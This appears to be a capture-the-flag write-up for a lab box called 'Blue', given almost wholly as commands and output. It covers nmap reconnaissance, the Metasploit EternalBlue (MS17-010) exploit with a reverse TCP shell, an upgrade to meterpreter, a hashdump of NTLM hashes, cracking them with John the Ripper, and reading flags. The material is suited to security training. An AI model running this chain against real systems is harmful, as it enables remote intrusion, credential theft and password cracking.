Blue

Intro
Recon
Exploitation

Privilege Escalation


Post Exploitation
Cracking

Flags



Last updated








Last updated
nmap -p1-1000 10.10.177.175
nmap -sV -p445 10.10.177.175
nmap --script smb-vuln-ms17-010 -p445 10.10.177.175msfconsole -qsearch ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/shell/reverse_tcp
set RHOSTS 10.10.177.175
set LHOST 10.18.65.48
# LHOST = tun0 VPN interface IP
run
background # or CTRL+Zsearch shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
sessions
set SESSION 2
runsessions 5
getuid
Server username: NT AUTHORITY\SYSTEM
psmigrate 1284hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:echo 'ffb43f0de35be4d9917ac0cc8ad57f8d' > jonhash.txt
john --format=nt --wordlist=/usr/share/wordlists/rockyou.txt jonhash.txtcd C:\\
dir
cat flag1.txt
flag{*******************cd C:/Windows/System32/config
cat flag2.txt
flag{*****************************cd C:\\Users\\
dir
cd Jon
cd Documents
cat flag3.txt
flag{********************************